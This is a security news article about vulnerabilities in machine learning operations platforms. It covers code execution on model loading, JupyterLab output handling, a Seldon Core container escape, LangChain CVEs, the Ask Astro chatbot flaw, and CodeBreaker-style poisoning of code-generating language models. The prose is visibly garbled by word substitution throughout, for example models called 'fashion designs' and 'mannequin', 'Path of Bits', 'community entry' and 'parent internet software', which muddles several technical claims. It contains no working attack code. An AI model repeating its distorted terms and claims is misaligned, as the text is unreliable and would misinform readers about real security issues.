Researchers caution about the risks within the machine learning software supply chain after identifying over 20 vulnerabilities that can be exploited to target MLOps platforms, highlighting potential safety dangers.
These inherent and implementation-based flaws in vulnerabilities could have severe consequences, including the potential for arbitrary code execution or the introduction of malicious data sets.
ML ops platforms empower the creation and execution of machine learning model pipelines, featuring a model registry as a centralised repository for storing and version-controlling trained models. These fashion designs can be seamlessly integrated into a software application or made accessible for other users to query through an Application Programming Interface (API), effectively transforming the models into a service that can be leveraged and utilized.
“Inherent vulnerabilities are flaws stemming from the fundamental codec and process architecture of a given field or technology, according to a comprehensive report by JFrog researchers.”
Inherent vulnerabilities include exploiting machine learning models to execute attacker-controlled code, leveraging the fact that models enable automated code execution upon loading, for instance.
This habit also extends to certain dataset formats and libraries, permitting automated code execution upon loading a publicly available dataset, potentially enabling the introduction of malware attacks when simply loading a publicly accessible dataset?
JupyterLab, formerly known as Jupyter Notebook, is a web-based interactive computing environment that enables users to execute blocks or cells of code and visualize their outputs.
The researchers pinpointed a fundamental challenge that often escapes attention: navigating HTML output while working with code blocks in Jupyter notebooks. The output of your Python code may well generate HTML and JavaScript, which is likely to be successfully rendered by your browser.
The concern lies in the fact that the executed JavaScript consequence is not properly isolated from the parent internet software, thereby enabling the parent to execute arbitrary Python code without restriction.
An assailant could potentially embed harmful JavaScript code in a JupyterLab notebook, creating a fresh cell and injecting malicious Python code before executing it. In many cases, exploiting a cross-site scripting (XSS) vulnerability is indeed significant.
The vulnerability, with a CVSS score of 7.5, stemmed from the lack of proper sanitization when interacting with untrusted inputs, allowing for client-side code execution in JupyterLab.
Researchers underscored a crucial takeaway: ML libraries with XSS vulnerabilities must be treated as potential vectors for arbitrary code execution, given that data scientists may utilize these libraries within Jupyter Notebook environments.
Implementation weaknesses, akin to those found in unauthenticated MLOps platforms, may permit a sophisticated attacker to exploit the ML Pipeline function and gain code execution capabilities through community entry, thereby compromising the security of the system.
Vulnerabilities in software are no longer hypothetical, with malicious actors exploiting these weaknesses for financial gain, exemplified by the instance of unpatched Anyscale Ray (CVSS rating: 9.8) being leveraged to distribute cryptocurrency miners.
A critical container escape vulnerability in Seldon Core enables attackers to bypass code execution constraints, allowing them to move laterally across the cloud environment, access other users’ models, and datasets by deploying a malicious model on the inference server.
The culmination of chaining these vulnerabilities is the potential for attackers to breach corporate systems, spreading far beyond initial infiltration to compromise servers as well.
“When deploying a platform that enables model serving, it’s crucial to recognize that anyone authorized to deploy a new model can potentially execute arbitrary code on that server,” the researchers warned. “Verify that the environment surrounding the mannequin is completely isolated and secured against any potential escape or breach.”
Two newly patched vulnerabilities were identified in Palo Alto Networks’ Unit 42, affecting the open-source LangChain generative AI framework, specifically CVE-2023-46229 and CVE-2023-44467, which if exploited could have enabled attackers to execute arbitrary code or gain unauthorized access to sensitive information.
In the final month, Path of Bits inadvertently introduced a vulnerability to their Ask Astro, an open-source Retrieval Augmented Generation (RAG) chatbot software. This flaw led to chatbot output poisoning, inaccurate document ingestion, and potentially crippling denial-of-service (DoS) attacks.
As concerns about AI’s reliability continue to emerge, malicious actors are exploiting vulnerabilities by contaminating training data with the ultimate goal of deceiving large language models (LLMs) and eliciting flawed responses.
“In contradistinction to current attacks that conceal malicious payloads within detectable or innocuous segments of the code, CodeBreaker exploits Large Language Models (LLMs) like GPT-4 for sophisticated payload transformation, ensuring that both poisoned knowledge and generated code can circumvent robust vulnerability detection.”